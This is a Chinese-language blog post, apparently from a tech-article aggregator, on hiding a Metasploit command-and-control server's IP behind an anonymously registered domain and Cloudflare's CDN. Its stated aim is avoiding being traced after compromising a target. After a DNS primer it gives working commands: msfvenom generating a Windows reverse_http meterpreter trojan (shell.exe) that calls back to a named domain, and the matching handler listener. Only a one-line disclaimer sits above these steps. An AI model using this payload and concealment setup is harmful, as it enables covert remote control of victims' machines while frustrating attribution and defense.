当前位置:网站首页>Metasploit-域名上线隐藏IP
Metasploit-域名上线隐藏IP
2022-08-04 23:49:00 【曲折上升】
仅供学习使用,请勿用于非法途径,后果自负
Metasploit域名上线隐藏IP
概述
为什么要隐藏IP?
在拿下了目标机之后,目标机在内网里面,使用msf或者CS时,用自己的VPS做服务器的话,导致很容易被溯源。
域名上线原理
当我们访问域名时会经过域名解析 域名解析就是域名到IP地址的转换过程,那么就意味这我们访问域名实际上最后是访问的真实IP。
A记录: 将域名指向一个IPv4地址(例如:100.100.100.100),需要增加A记录。
CNAME记录: 如果将域名指向一个域名,实现与被指向域名相同的访问效果,需要增加CNAME记录。这个域名一般是主机服务商提供的一个域名。
MX记录: 建立电子邮箱服务,将指向邮件服务器地址,需要设置MX记录。建立邮箱时,一般会根据邮箱服务商提供的MX记录填写此记录。
NS记录: 域名解析服务器记录,如果要将子域名指定某个域名服务器来解析,需要设置NS记录。
TXT记录: 可任意填写,可为空。一般做一些验证记录时会使用此项,如:做SPF(反垃圾邮件)记录。
AAAA记录: 将主机名(或域名)指向一个IPv6地址(例如:ff03:0:0:0:0:0:0:c1),需要添加AAAA记录。
通过CDN上线MSF
CDN的全称是Content Delivery Network,即内容分发网络。其目的是通过在现有的Internet中增加一层新的CACHE(缓存)层,将网站的内容发布到最接近用户的网络”边缘“的节点,目的提高用户访问网站的速度。

CDN上线具体实现
基础配置:一台VPS、一个域名,这里的VPS最好是匿名的
既然是隐藏自身 那么域名肯定不能使用自己备案的域名
https://freenom.com/ 注册免费域名 注册失败,可以用gmail注册
https://cart.godaddy.com/ 注册匿名域名
https://www.cloudflare.com/ 免费CDN
购买好域名之后,进入cloudflare.com添加域名。

添加A记录。

返回https://cart.godaddy.com/进行入门指南的设置。



将所有的开关都关闭。编辑名称服务器,设置为cloudflare.com的名称服务器。
点击改变



检查是否配置成功。
ping下该域名,查看是否为vps的IP地址,不是的话则配置成功。

配置成功。
- MSF生成木马
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=www.zsyyme.info LPORT=2095 -f exe -o shell.exe

- MSF开启相对应监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set lhost www.zsyyme.info
set lport 2095
run


- 用wireshark抓取流量即可!
边栏推荐
- 3. Actual combat---crawl the result page corresponding to Baidu's specified entry (a simple page collector)
- 基于Appian低代码平台开发一个SpaceX网站
- Service Mesh landing path
- Mathematical Principles of Matrix
- 测试技术:关于上下文驱动测试的总结
- 【无标题】线程三连鞭之“线程池”
- 注解@EnableAutoConfiguration的作用以及如何使用
- uniapp sharing function - share to friends group chat circle of friends effect (sorting)
- 2022年华数杯数学建模
- 【七夕情人节特效】-- canvas实现满屏爱心
猜你喜欢

深度|医疗行业勒索病毒防治解决方案

年薪50W+的测试工程师都在用这个:Jmeter 脚本开发之——扩展函数

407. 接雨水 II

【LeetCode】矩阵模拟相关题目汇总

加解密在线工具和进制转化在线工具

MongoDB permission verification is turned on and mongoose database configuration

Security software Avast and Symantec NortonLifeLock merge with UK approval, market value soars 43%

小黑leetcode冲浪:94. 二叉树的中序遍历

Modelers experience sharing: model study method

First, the basic concept of reptiles
随机推荐
使用OpenCV实现一个文档自动扫描仪
Basic web in PLSQL
Literature reading ten - Detect Rumors on Twitter by Promoting Information Campaigns with Generative Adversarial Learn
Basic web in PLSQL
VMware NSX 4.0 -- 网络安全虚拟化平台
LeetCode Hot 100
【LeetCode】滑动窗口题解汇总
NebulaGraph v3.2.0 Release Note, many optimizations such as the performance of querying the shortest path
Getting started with 3D modeling for games, what modeling software can I choose?
未上市就“一举成名”,空间媲美途昂,安全、舒适一个不落
Develop a SpaceX website based on the Appian low-code platform
MySQL基础篇【聚合函数】
The applicable scenarios and common product types of the KT148A electronic voice chip ic solution
中日颜色风格
Ab3d.PowerToys and Ab3d.DXEngine Crack
【云原生--Kubernetes】Pod控制器
KT6368A蓝牙的认证问题_FCC和BQB_CE_KC认证或者其它说明
[CVA Valuation Training Camp] Financial Modeling Guide - Lecture 1
资深游戏建模师告知新手,游戏场景建模师必备软件有哪些?
2022年华数杯数学建模